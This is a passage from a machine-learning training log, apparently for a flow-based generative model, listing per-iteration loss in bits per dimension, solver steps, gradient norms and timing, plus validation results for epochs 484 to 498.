Bit/dim 1.0774(1.0756) | Xent 0.0000(0.0000) | Loss 1.0774(1.0756) | Error 0.0000(0.0000) Steps 446(442.81) | Grad Norm 0.0937(0.0829) | Total Time 10.00(10.00)\nIter 5360 | Time 40.1955(40.5284) | Bit/dim 1.0761(1.0756) | Xent 0.0000(0.0000) | Loss 1.0761(1.0756) | Error 0.0000(0.0000) Steps 446(442.90) | Grad Norm 0.0664(0.0824) | Total Time 10.00(10.00)\nIter 5361 | Time 41.1429(40.5468) | Bit/dim 1.0738(1.0756) | Xent 0.0000(0.0000) | Loss 1.0738(1.0756) | Error 0.0000(0.0000) Steps 440(442.82) | Grad Norm 0.0703(0.0821) | Total Time 10.00(10.00)\nIter 5362 | Time 40.7950(40.5542) | Bit/dim 1.0779(1.0757) | Xent 0.0000(0.0000) | Loss 1.0779(1.0757) | Error 0.0000(0.0000) Steps 440(442.73) | Grad Norm 0.0669(0.0816) | Total Time 10.00(10.00)\nIter 5363 | Time 40.1171(40.5411) | Bit/dim 1.0787(1.0758) | Xent 0.0000(0.0000) | Loss 1.0787(1.0758) | Error 0.0000(0.0000) Steps 446(442.83) | Grad Norm 0.0724(0.0813) | Total Time 10.00(10.00)\nIter 5364 | Time 39.1679(40.4999) | Bit/dim 1.0728(1.0757) | Xent 0.0000(0.0000) | Loss 1.0728(1.0757) | Error 0.0000(0.0000) Steps 440(442.75) | Grad Norm 0.0760(0.0812) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0484 | Time 15.2820, Epoch Time 308.9097(310.7403), Bit/dim 1.0711(best: 1.0703), Xent 0.0000, Loss 1.0711, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5365 | Time 39.4265(40.4677) | Bit/dim 1.0745(1.0756) | Xent 0.0000(0.0000) | Loss 1.0745(1.0756) | Error 0.0000(0.0000) Steps 446(442.84) | Grad Norm 0.0658(0.0807) | Total Time 10.00(10.00)\nIter 5366 | Time 39.3102(40.4330) | Bit/dim 1.0761(1.0756) | Xent 0.0000(0.0000) | Loss 1.0761(1.0756) | Error 0.0000(0.0000) Steps 440(442.76) | Grad Norm 0.0605(0.0801) | Total Time 10.00(10.00)\nIter 5367 | Time 39.9478(40.4184) | Bit/dim 1.0790(1.0757) | Xent 0.0000(0.0000) | Loss 1.0790(1.0757) | Error 0.0000(0.0000) Steps 446(442.86) | Grad Norm 0.1132(0.0811) | Total Time 10.00(10.00)\nIter 5368 | Time 39.8139(40.4003) | Bit/dim 1.0747(1.0757) | Xent 0.0000(0.0000) | Loss 1.0747(1.0757) | Error 0.0000(0.0000) Steps 440(442.77) | Grad Norm 0.0824(0.0811) | Total Time 10.00(10.00)\nIter 5369 | Time 39.1104(40.3616) | Bit/dim 1.0716(1.0756) | Xent 0.0000(0.0000) | Loss 1.0716(1.0756) | Error 0.0000(0.0000) Steps 446(442.87) | Grad Norm 0.0591(0.0805) | Total Time 10.00(10.00)\nIter 5370 | Time 39.9976(40.3507) | Bit/dim 1.0752(1.0756) | Xent 0.0000(0.0000) | Loss 1.0752(1.0756) | Error 0.0000(0.0000) Steps 446(442.96) | Grad Norm 0.0716(0.0802) | Total Time 10.00(10.00)\nIter 5371 | Time 40.8661(40.3662) | Bit/dim 1.0719(1.0755) | Xent 0.0000(0.0000) | Loss 1.0719(1.0755) | Error 0.0000(0.0000) Steps 446(443.05) | Grad Norm 0.0807(0.0802) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0485 | Time 15.0067, Epoch Time 305.8891(310.5948), Bit/dim 1.0704(best: 1.0703), Xent 0.0000, Loss 1.0704, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5372 | Time 39.2532(40.3328) | Bit/dim 1.0768(1.0755) | Xent 0.0000(0.0000) | Loss 1.0768(1.0755) | Error 0.0000(0.0000) Steps 446(443.14) | Grad Norm 0.0579(0.0796) | Total Time 10.00(10.00)\nIter 5373 | Time 40.7506(40.3453) | Bit/dim 1.0736(1.0754) | Xent 0.0000(0.0000) | Loss 1.0736(1.0754) | Error 0.0000(0.0000) Steps 440(443.05) | Grad Norm 0.0759(0.0794) | Total Time 10.00(10.00)\nIter 5374 | Time 41.4352(40.3780) | Bit/dim 1.0769(1.0755) | Xent 0.0000(0.0000) | Loss 1.0769(1.0755) | Error 0.0000(0.0000) Steps 440(442.95) | Grad Norm 0.1120(0.0804) | Total Time 10.00(10.00)\nIter 5375 | Time 41.1483(40.4011) | Bit/dim 1.0709(1.0754) | Xent 0.0000(0.0000) | Loss 1.0709(1.0754) | Error 0.0000(0.0000) Steps 440(442.87) | Grad Norm 0.0701(0.0801) | Total Time 10.00(10.00)\nIter 5376 | Time 38.9518(40.3576) | Bit/dim 1.0780(1.0754) | Xent 0.0000(0.0000) | Loss 1.0780(1.0754) | Error 0.0000(0.0000) Steps 440(442.78) | Grad Norm 0.0773(0.0800) | Total Time 10.00(10.00)\nIter 5377 | Time 41.3253(40.3867) | Bit/dim 1.0766(1.0755) | Xent 0.0000(0.0000) | Loss 1.0766(1.0755) | Error 0.0000(0.0000) Steps 446(442.88) | Grad Norm 0.0554(0.0793) | Total Time 10.00(10.00)\nIter 5378 | Time 39.4701(40.3592) | Bit/dim 1.0757(1.0755) | Xent 0.0000(0.0000) | Loss 1.0757(1.0755) | Error 0.0000(0.0000) Steps 446(442.97) | Grad Norm 0.0632(0.0788) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0486 | Time 15.0123, Epoch Time 309.8866(310.5736), Bit/dim 1.0707(best: 1.0703), Xent 0.0000, Loss 1.0707, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5379 | Time 39.3132(40.3278) | Bit/dim 1.0784(1.0756) | Xent 0.0000(0.0000) | Loss 1.0784(1.0756) | Error 0.0000(0.0000) Steps 446(443.06) | Grad Norm 0.1022(0.0795) | Total Time 10.00(10.00)\nIter 5380 | Time 40.7892(40.3416) | Bit/dim 1.0748(1.0755) | Xent 0.0000(0.0000) | Loss 1.0748(1.0755) | Error 0.0000(0.0000) Steps 446(443.15) | Grad Norm 0.0576(0.0789) | Total Time 10.00(10.00)\nIter 5381 | Time 40.1644(40.3363) | Bit/dim 1.0718(1.0754) | Xent 0.0000(0.0000) | Loss 1.0718(1.0754) | Error 0.0000(0.0000) Steps 452(443.41) | Grad Norm 0.0735(0.0787) | Total Time 10.00(10.00)\nIter 5382 | Time 39.0427(40.2975) | Bit/dim 1.0758(1.0754) | Xent 0.0000(0.0000) | Loss 1.0758(1.0754) | Error 0.0000(0.0000) Steps 440(443.31) | Grad Norm 0.0559(0.0780) | Total Time 10.00(10.00)\nIter 5383 | Time 42.5482(40.3650) | Bit/dim 1.0746(1.0754) | Xent 0.0000(0.0000) | Loss 1.0746(1.0754) | Error 0.0000(0.0000) Steps 446(443.39) | Grad Norm 0.0685(0.0777) | Total Time 10.00(10.00)\nIter 5384 | Time 41.5079(40.3993) | Bit/dim 1.0708(1.0753) | Xent 0.0000(0.0000) | Loss 1.0708(1.0753) | Error 0.0000(0.0000) Steps 446(443.47) | Grad Norm 0.0742(0.0776) | Total Time 10.00(10.00)\nIter 5385 | Time 39.3271(40.3671) | Bit/dim 1.0775(1.0753) | Xent 0.0000(0.0000) | Loss 1.0775(1.0753) | Error 0.0000(0.0000) Steps 446(443.55) | Grad Norm 0.0629(0.0772) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0487 | Time 15.0900, Epoch Time 310.3451(310.5667), Bit/dim 1.0706(best: 1.0703), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5386 | Time 40.6921(40.3769) | Bit/dim 1.0826(1.0756) | Xent 0.0000(0.0000) | Loss 1.0826(1.0756) | Error 0.0000(0.0000) Steps 440(443.44) | Grad Norm 0.0683(0.0769) | Total Time 10.00(10.00)\nIter 5387 | Time 41.0103(40.3959) | Bit/dim 1.0752(1.0756) | Xent 0.0000(0.0000) | Loss 1.0752(1.0756) | Error 0.0000(0.0000) Steps 446(443.52) | Grad Norm 0.0708(0.0767) | Total Time 10.00(10.00)\nIter 5388 | Time 40.9302(40.4119) | Bit/dim 1.0744(1.0755) | Xent 0.0000(0.0000) | Loss 1.0744(1.0755) | Error 0.0000(0.0000) Steps 446(443.59) | Grad Norm 0.1245(0.0782) | Total Time 10.00(10.00)\nIter 5389 | Time 41.4786(40.4439) | Bit/dim 1.0734(1.0755) | Xent 0.0000(0.0000) | Loss 1.0734(1.0755) | Error 0.0000(0.0000) Steps 440(443.48) | Grad Norm 0.0777(0.0781) | Total Time 10.00(10.00)\nIter 5390 | Time 42.6880(40.5112) | Bit/dim 1.0762(1.0755) | Xent 0.0000(0.0000) | Loss 1.0762(1.0755) | Error 0.0000(0.0000) Steps 446(443.56) | Grad Norm 0.0742(0.0780) | Total Time 10.00(10.00)\nIter 5391 | Time 40.7329(40.5179) | Bit/dim 1.0746(1.0755) | Xent 0.0000(0.0000) | Loss 1.0746(1.0755) | Error 0.0000(0.0000) Steps 446(443.63) | Grad Norm 0.1025(0.0788) | Total Time 10.00(10.00)\nIter 5392 | Time 40.3285(40.5122) | Bit/dim 1.0731(1.0754) | Xent 0.0000(0.0000) | Loss 1.0731(1.0754) | Error 0.0000(0.0000) Steps 446(443.70) | Grad Norm 0.0571(0.0781) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0488 | Time 14.8987, Epoch Time 315.2446(310.7070), Bit/dim 1.0706(best: 1.0703), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5393 | Time 39.6445(40.4862) | Bit/dim 1.0768(1.0754) | Xent 0.0000(0.0000) | Loss 1.0768(1.0754) | Error 0.0000(0.0000) Steps 446(443.77) | Grad Norm 0.0623(0.0776) | Total Time 10.00(10.00)\nIter 5394 | Time 38.4300(40.4245) | Bit/dim 1.0757(1.0754) | Xent 0.0000(0.0000) | Loss 1.0757(1.0754) | Error 0.0000(0.0000) Steps 446(443.84) | Grad Norm 0.0570(0.0770) | Total Time 10.00(10.00)\nIter 5395 | Time 41.2763(40.4501) | Bit/dim 1.0714(1.0753) | Xent 0.0000(0.0000) | Loss 1.0714(1.0753) | Error 0.0000(0.0000) Steps 452(444.08) | Grad Norm 0.0712(0.0768) | Total Time 10.00(10.00)\nIter 5396 | Time 41.5962(40.4844) | Bit/dim 1.0750(1.0753) | Xent 0.0000(0.0000) | Loss 1.0750(1.0753) | Error 0.0000(0.0000) Steps 452(444.32) | Grad Norm 0.0873(0.0772) | Total Time 10.00(10.00)\nIter 5397 | Time 39.2665(40.4479) | Bit/dim 1.0768(1.0753) | Xent 0.0000(0.0000) | Loss 1.0768(1.0753) | Error 0.0000(0.0000) Steps 446(444.37) | Grad Norm 0.0734(0.0770) | Total Time 10.00(10.00)\nIter 5398 | Time 39.9359(40.4325) | Bit/dim 1.0760(1.0754) | Xent 0.0000(0.0000) | Loss 1.0760(1.0754) | Error 0.0000(0.0000) Steps 446(444.42) | Grad Norm 0.0624(0.0766) | Total Time 10.00(10.00)\nIter 5399 | Time 39.5690(40.4066) | Bit/dim 1.0763(1.0754) | Xent 0.0000(0.0000) | Loss 1.0763(1.0754) | Error 0.0000(0.0000) Steps 452(444.65) | Grad Norm 0.0926(0.0771) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0489 | Time 14.9054, Epoch Time 307.1891(310.6015), Bit/dim 1.0702(best: 1.0703), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5400 | Time 39.0631(40.3663) | Bit/dim 1.0802(1.0755) | Xent 0.0000(0.0000) | Loss 1.0802(1.0755) | Error 0.0000(0.0000) Steps 452(444.87) | Grad Norm 0.1132(0.0782) | Total Time 10.00(10.00)\nIter 5401 | Time 39.2523(40.3329) | Bit/dim 1.0758(1.0755) | Xent 0.0000(0.0000) | Loss 1.0758(1.0755) | Error 0.0000(0.0000) Steps 446(444.90) | Grad Norm 0.1115(0.0792) | Total Time 10.00(10.00)\nIter 5402 | Time 39.6000(40.3109) | Bit/dim 1.0742(1.0755) | Xent 0.0000(0.0000) | Loss 1.0742(1.0755) | Error 0.0000(0.0000) Steps 446(444.94) | Grad Norm 0.0642(0.0787) | Total Time 10.00(10.00)\nIter 5403 | Time 39.8884(40.2982) | Bit/dim 1.0733(1.0754) | Xent 0.0000(0.0000) | Loss 1.0733(1.0754) | Error 0.0000(0.0000) Steps 446(444.97) | Grad Norm 0.0495(0.0778) | Total Time 10.00(10.00)\nIter 5404 | Time 40.7541(40.3119) | Bit/dim 1.0757(1.0754) | Xent 0.0000(0.0000) | Loss 1.0757(1.0754) | Error 0.0000(0.0000) Steps 446(445.00) | Grad Norm 0.0787(0.0779) | Total Time 10.00(10.00)\nIter 5405 | Time 39.7664(40.2956) | Bit/dim 1.0729(1.0754) | Xent 0.0000(0.0000) | Loss 1.0729(1.0754) | Error 0.0000(0.0000) Steps 440(444.85) | Grad Norm 0.0921(0.0783) | Total Time 10.00(10.00)\nIter 5406 | Time 41.1215(40.3203) | Bit/dim 1.0744(1.0753) | Xent 0.0000(0.0000) | Loss 1.0744(1.0753) | Error 0.0000(0.0000) Steps 440(444.70) | Grad Norm 0.0707(0.0781) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0490 | Time 15.2516, Epoch Time 307.1399(310.4977), Bit/dim 1.0705(best: 1.0702), Xent 0.0000, Loss 1.0705, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5407 | Time 40.3268(40.3205) | Bit/dim 1.0738(1.0753) | Xent 0.0000(0.0000) | Loss 1.0738(1.0753) | Error 0.0000(0.0000) Steps 446(444.74) | Grad Norm 0.1073(0.0789) | Total Time 10.00(10.00)\nIter 5408 | Time 40.2879(40.3195) | Bit/dim 1.0784(1.0754) | Xent 0.0000(0.0000) | Loss 1.0784(1.0754) | Error 0.0000(0.0000) Steps 440(444.60) | Grad Norm 0.0547(0.0782) | Total Time 10.00(10.00)\nIter 5409 | Time 39.3468(40.2904) | Bit/dim 1.0736(1.0753) | Xent 0.0000(0.0000) | Loss 1.0736(1.0753) | Error 0.0000(0.0000) Steps 446(444.64) | Grad Norm 0.0654(0.0778) | Total Time 10.00(10.00)\nIter 5410 | Time 38.7655(40.2446) | Bit/dim 1.0747(1.0753) | Xent 0.0000(0.0000) | Loss 1.0747(1.0753) | Error 0.0000(0.0000) Steps 452(444.86) | Grad Norm 0.0675(0.0775) | Total Time 10.00(10.00)\nIter 5411 | Time 39.4964(40.2222) | Bit/dim 1.0745(1.0753) | Xent 0.0000(0.0000) | Loss 1.0745(1.0753) | Error 0.0000(0.0000) Steps 446(444.90) | Grad Norm 0.0858(0.0778) | Total Time 10.00(10.00)\nIter 5412 | Time 40.9310(40.2434) | Bit/dim 1.0773(1.0753) | Xent 0.0000(0.0000) | Loss 1.0773(1.0753) | Error 0.0000(0.0000) Steps 446(444.93) | Grad Norm 0.0651(0.0774) | Total Time 10.00(10.00)\nIter 5413 | Time 40.6976(40.2571) | Bit/dim 1.0767(1.0754) | Xent 0.0000(0.0000) | Loss 1.0767(1.0754) | Error 0.0000(0.0000) Steps 452(445.14) | Grad Norm 0.0693(0.0771) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0491 | Time 15.0689, Epoch Time 307.2274(310.3995), Bit/dim 1.0706(best: 1.0702), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5414 | Time 39.2502(40.2269) | Bit/dim 1.0776(1.0755) | Xent 0.0000(0.0000) | Loss 1.0776(1.0755) | Error 0.0000(0.0000) Steps 440(444.99) | Grad Norm 0.0702(0.0769) | Total Time 10.00(10.00)\nIter 5415 | Time 41.8908(40.2768) | Bit/dim 1.0750(1.0754) | Xent 0.0000(0.0000) | Loss 1.0750(1.0754) | Error 0.0000(0.0000) Steps 446(445.02) | Grad Norm 0.0553(0.0763) | Total Time 10.00(10.00)\nIter 5416 | Time 41.9257(40.3262) | Bit/dim 1.0762(1.0755) | Xent 0.0000(0.0000) | Loss 1.0762(1.0755) | Error 0.0000(0.0000) Steps 446(445.05) | Grad Norm 0.1211(0.0776) | Total Time 10.00(10.00)\nIter 5417 | Time 41.2622(40.3543) | Bit/dim 1.0767(1.0755) | Xent 0.0000(0.0000) | Loss 1.0767(1.0755) | Error 0.0000(0.0000) Steps 446(445.08) | Grad Norm 0.0541(0.0769) | Total Time 10.00(10.00)\nIter 5418 | Time 39.1406(40.3179) | Bit/dim 1.0774(1.0756) | Xent 0.0000(0.0000) | Loss 1.0774(1.0756) | Error 0.0000(0.0000) Steps 446(445.10) | Grad Norm 0.0533(0.0762) | Total Time 10.00(10.00)\nIter 5419 | Time 41.1854(40.3439) | Bit/dim 1.0726(1.0755) | Xent 0.0000(0.0000) | Loss 1.0726(1.0755) | Error 0.0000(0.0000) Steps 452(445.31) | Grad Norm 0.0507(0.0755) | Total Time 10.00(10.00)\nIter 5420 | Time 39.8815(40.3301) | Bit/dim 1.0742(1.0754) | Xent 0.0000(0.0000) | Loss 1.0742(1.0754) | Error 0.0000(0.0000) Steps 446(445.33) | Grad Norm 0.0584(0.0749) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0492 | Time 15.0266, Epoch Time 311.9734(310.4468), Bit/dim 1.0701(best: 1.0702), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5421 | Time 41.1099(40.3535) | Bit/dim 1.0762(1.0755) | Xent 0.0000(0.0000) | Loss 1.0762(1.0755) | Error 0.0000(0.0000) Steps 446(445.35) | Grad Norm 0.0679(0.0747) | Total Time 10.00(10.00)\nIter 5422 | Time 39.5136(40.3283) | Bit/dim 1.0743(1.0754) | Xent 0.0000(0.0000) | Loss 1.0743(1.0754) | Error 0.0000(0.0000) Steps 446(445.37) | Grad Norm 0.0688(0.0745) | Total Time 10.00(10.00)\nIter 5423 | Time 41.5643(40.3653) | Bit/dim 1.0736(1.0754) | Xent 0.0000(0.0000) | Loss 1.0736(1.0754) | Error 0.0000(0.0000) Steps 446(445.39) | Grad Norm 0.0559(0.0740) | Total Time 10.00(10.00)\nIter 5424 | Time 41.5564(40.4011) | Bit/dim 1.0747(1.0753) | Xent 0.0000(0.0000) | Loss 1.0747(1.0753) | Error 0.0000(0.0000) Steps 446(445.41) | Grad Norm 0.0684(0.0738) | Total Time 10.00(10.00)\nIter 5425 | Time 41.1813(40.4245) | Bit/dim 1.0793(1.0755) | Xent 0.0000(0.0000) | Loss 1.0793(1.0755) | Error 0.0000(0.0000) Steps 440(445.25) | Grad Norm 0.0641(0.0735) | Total Time 10.00(10.00)\nIter 5426 | Time 42.0068(40.4719) | Bit/dim 1.0752(1.0755) | Xent 0.0000(0.0000) | Loss 1.0752(1.0755) | Error 0.0000(0.0000) Steps 446(445.27) | Grad Norm 0.0651(0.0733) | Total Time 10.00(10.00)\nIter 5427 | Time 39.2922(40.4366) | Bit/dim 1.0733(1.0754) | Xent 0.0000(0.0000) | Loss 1.0733(1.0754) | Error 0.0000(0.0000) Steps 446(445.29) | Grad Norm 0.0843(0.0736) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0493 | Time 14.9795, Epoch Time 313.6108(310.5417), Bit/dim 1.0702(best: 1.0701), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5428 | Time 39.5080(40.4087) | Bit/dim 1.0729(1.0753) | Xent 0.0000(0.0000) | Loss 1.0729(1.0753) | Error 0.0000(0.0000) Steps 452(445.49) | Grad Norm 0.0743(0.0736) | Total Time 10.00(10.00)\nIter 5429 | Time 40.8490(40.4219) | Bit/dim 1.0769(1.0754) | Xent 0.0000(0.0000) | Loss 1.0769(1.0754) | Error 0.0000(0.0000) Steps 452(445.69) | Grad Norm 0.0615(0.0733) | Total Time 10.00(10.00)\nIter 5430 | Time 40.0644(40.4112) | Bit/dim 1.0699(1.0752) | Xent 0.0000(0.0000) | Loss 1.0699(1.0752) | Error 0.0000(0.0000) Steps 452(445.88) | Grad Norm 0.0519(0.0726) | Total Time 10.00(10.00)\nIter 5431 | Time 41.9424(40.4571) | Bit/dim 1.0772(1.0753) | Xent 0.0000(0.0000) | Loss 1.0772(1.0753) | Error 0.0000(0.0000) Steps 440(445.70) | Grad Norm 0.0671(0.0725) | Total Time 10.00(10.00)\nIter 5432 | Time 39.2479(40.4208) | Bit/dim 1.0767(1.0753) | Xent 0.0000(0.0000) | Loss 1.0767(1.0753) | Error 0.0000(0.0000) Steps 452(445.89) | Grad Norm 0.0790(0.0727) | Total Time 10.00(10.00)\nIter 5433 | Time 41.5968(40.4561) | Bit/dim 1.0766(1.0753) | Xent 0.0000(0.0000) | Loss 1.0766(1.0753) | Error 0.0000(0.0000) Steps 440(445.71) | Grad Norm 0.0693(0.0726) | Total Time 10.00(10.00)\nIter 5434 | Time 39.5393(40.4286) | Bit/dim 1.0765(1.0754) | Xent 0.0000(0.0000) | Loss 1.0765(1.0754) | Error 0.0000(0.0000) Steps 452(445.90) | Grad Norm 0.0864(0.0730) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0494 | Time 15.0528, Epoch Time 310.3135(310.5348), Bit/dim 1.0701(best: 1.0701), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5435 | Time 41.4687(40.4598) | Bit/dim 1.0749(1.0754) | Xent 0.0000(0.0000) | Loss 1.0749(1.0754) | Error 0.0000(0.0000) Steps 440(445.72) | Grad Norm 0.0780(0.0731) | Total Time 10.00(10.00)\nIter 5436 | Time 40.7359(40.4681) | Bit/dim 1.0738(1.0753) | Xent 0.0000(0.0000) | Loss 1.0738(1.0753) | Error 0.0000(0.0000) Steps 452(445.91) | Grad Norm 0.0749(0.0732) | Total Time 10.00(10.00)\nIter 5437 | Time 40.3169(40.4636) | Bit/dim 1.0773(1.0754) | Xent 0.0000(0.0000) | Loss 1.0773(1.0754) | Error 0.0000(0.0000) Steps 446(445.91) | Grad Norm 0.0555(0.0726) | Total Time 10.00(10.00)\nIter 5438 | Time 39.1076(40.4229) | Bit/dim 1.0753(1.0754) | Xent 0.0000(0.0000) | Loss 1.0753(1.0754) | Error 0.0000(0.0000) Steps 446(445.92) | Grad Norm 0.1392(0.0746) | Total Time 10.00(10.00)\nIter 5439 | Time 39.9198(40.4078) | Bit/dim 1.0745(1.0753) | Xent 0.0000(0.0000) | Loss 1.0745(1.0753) | Error 0.0000(0.0000) Steps 446(445.92) | Grad Norm 0.1103(0.0757) | Total Time 10.00(10.00)\nIter 5440 | Time 41.5257(40.4413) | Bit/dim 1.0779(1.0754) | Xent 0.0000(0.0000) | Loss 1.0779(1.0754) | Error 0.0000(0.0000) Steps 452(446.10) | Grad Norm 0.0576(0.0752) | Total Time 10.00(10.00)\nIter 5441 | Time 39.2382(40.4052) | Bit/dim 1.0727(1.0753) | Xent 0.0000(0.0000) | Loss 1.0727(1.0753) | Error 0.0000(0.0000) Steps 446(446.10) | Grad Norm 0.1045(0.0761) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0495 | Time 15.1484, Epoch Time 310.1574(310.5235), Bit/dim 1.0700(best: 1.0701), Xent 0.0000, Loss 1.0700, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5442 | Time 39.8954(40.3899) | Bit/dim 1.0751(1.0753) | Xent 0.0000(0.0000) | Loss 1.0751(1.0753) | Error 0.0000(0.0000) Steps 446(446.10) | Grad Norm 0.1933(0.0796) | Total Time 10.00(10.00)\nIter 5443 | Time 41.2722(40.4164) | Bit/dim 1.0768(1.0754) | Xent 0.0000(0.0000) | Loss 1.0768(1.0754) | Error 0.0000(0.0000) Steps 446(446.09) | Grad Norm 0.1002(0.0802) | Total Time 10.00(10.00)\nIter 5444 | Time 39.4040(40.3860) | Bit/dim 1.0757(1.0754) | Xent 0.0000(0.0000) | Loss 1.0757(1.0754) | Error 0.0000(0.0000) Steps 446(446.09) | Grad Norm 0.1083(0.0810) | Total Time 10.00(10.00)\nIter 5445 | Time 41.5364(40.4205) | Bit/dim 1.0781(1.0755) | Xent 0.0000(0.0000) | Loss 1.0781(1.0755) | Error 0.0000(0.0000) Steps 446(446.09) | Grad Norm 0.1582(0.0833) | Total Time 10.00(10.00)\nIter 5446 | Time 40.5723(40.4251) | Bit/dim 1.0722(1.0754) | Xent 0.0000(0.0000) | Loss 1.0722(1.0754) | Error 0.0000(0.0000) Steps 446(446.09) | Grad Norm 0.1207(0.0845) | Total Time 10.00(10.00)\nIter 5447 | Time 40.2565(40.4200) | Bit/dim 1.0772(1.0754) | Xent 0.0000(0.0000) | Loss 1.0772(1.0754) | Error 0.0000(0.0000) Steps 446(446.08) | Grad Norm 0.0695(0.0840) | Total Time 10.00(10.00)\nIter 5448 | Time 39.5373(40.3936) | Bit/dim 1.0743(1.0754) | Xent 0.0000(0.0000) | Loss 1.0743(1.0754) | Error 0.0000(0.0000) Steps 446(446.08) | Grad Norm 0.0845(0.0840) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0496 | Time 15.0401, Epoch Time 309.7803(310.5012), Bit/dim 1.0706(best: 1.0700), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5449 | Time 41.1259(40.4155) | Bit/dim 1.0737(1.0753) | Xent 0.0000(0.0000) | Loss 1.0737(1.0753) | Error 0.0000(0.0000) Steps 440(445.90) | Grad Norm 0.1273(0.0853) | Total Time 10.00(10.00)\nIter 5450 | Time 39.8165(40.3976) | Bit/dim 1.0784(1.0754) | Xent 0.0000(0.0000) | Loss 1.0784(1.0754) | Error 0.0000(0.0000) Steps 446(445.90) | Grad Norm 0.1284(0.0866) | Total Time 10.00(10.00)\nIter 5451 | Time 40.0210(40.3863) | Bit/dim 1.0747(1.0754) | Xent 0.0000(0.0000) | Loss 1.0747(1.0754) | Error 0.0000(0.0000) Steps 446(445.90) | Grad Norm 0.0658(0.0860) | Total Time 10.00(10.00)\nIter 5452 | Time 40.4235(40.3874) | Bit/dim 1.0737(1.0754) | Xent 0.0000(0.0000) | Loss 1.0737(1.0754) | Error 0.0000(0.0000) Steps 452(446.09) | Grad Norm 0.0519(0.0850) | Total Time 10.00(10.00)\nIter 5453 | Time 41.6957(40.4266) | Bit/dim 1.0757(1.0754) | Xent 0.0000(0.0000) | Loss 1.0757(1.0754) | Error 0.0000(0.0000) Steps 446(446.08) | Grad Norm 0.0758(0.0847) | Total Time 10.00(10.00)\nIter 5454 | Time 40.1612(40.4187) | Bit/dim 1.0734(1.0753) | Xent 0.0000(0.0000) | Loss 1.0734(1.0753) | Error 0.0000(0.0000) Steps 440(445.90) | Grad Norm 0.1123(0.0855) | Total Time 10.00(10.00)\nIter 5455 | Time 41.7344(40.4581) | Bit/dim 1.0765(1.0753) | Xent 0.0000(0.0000) | Loss 1.0765(1.0753) | Error 0.0000(0.0000) Steps 446(445.90) | Grad Norm 0.0880(0.0856) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0497 | Time 15.1730, Epoch Time 312.5887(310.5638), Bit/dim 1.0702(best: 1.0700), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5456 | Time 40.2965(40.4533) | Bit/dim 1.0711(1.0752) | Xent 0.0000(0.0000) | Loss 1.0711(1.0752) | Error 0.0000(0.0000) Steps 452(446.09) | Grad Norm 0.0629(0.0849) | Total Time 10.00(10.00)\nIter 5457 | Time 42.8316(40.5246) | Bit/dim 1.0728(1.0751) | Xent 0.0000(0.0000) | Loss 1.0728(1.0751) | Error 0.0000(0.0000) Steps 446(446.08) | Grad Norm 0.1533(0.0870) | Total Time 10.00(10.00)\nIter 5458 | Time 39.5422(40.4952) | Bit/dim 1.0751(1.0751) | Xent 0.0000(0.0000) | Loss 1.0751(1.0751) | Error 0.0000(0.0000) Steps 452(446.26) | Grad Norm 0.0957(0.0872) | Total Time 10.00(10.00)\nIter 5459 | Time 41.6850(40.5309) | Bit/dim 1.0779(1.0752) | Xent 0.0000(0.0000) | Loss 1.0779(1.0752) | Error 0.0000(0.0000) Steps 446(446.25) | Grad Norm 0.0566(0.0863) | Total Time 10.00(10.00)\nIter 5460 | Time 39.6229(40.5036) | Bit/dim 1.0760(1.0753) | Xent 0.0000(0.0000) | Loss 1.0760(1.0753) | Error 0.0000(0.0000) Steps 452(446.43) | Grad Norm 0.0658(0.0857) | Total Time 10.00(10.00)\nIter 5461 | Time 41.6678(40.5385) | Bit/dim 1.0758(1.0753) | Xent 0.0000(0.0000) | Loss 1.0758(1.0753) | Error 0.0000(0.0000) Steps 452(446.59) | Grad Norm 0.1446(0.0875) | Total Time 10.00(10.00)\nIter 5462 | Time 40.1698(40.5275) | Bit/dim 1.0801(1.0754) | Xent 0.0000(0.0000) | Loss 1.0801(1.0754) | Error 0.0000(0.0000) Steps 452(446.76) | Grad Norm 0.1100(0.0881) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0498 | Time 15.0502, Epoch Time 313.2645(310.6449), Bit/dim 1.0700(best: 1.0700), Xent 0.0000, Loss 1.0700, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5463 | Time 39.8676(40.5077) | Bit/dim 1.0767(1.0755) | Xent 0.0000(0.0000) | Loss 1.0767(1.0755) | Error 0.0000(0.0000) Steps 452(446.91) | Grad Norm 0.0823(0.0880) | Total Time 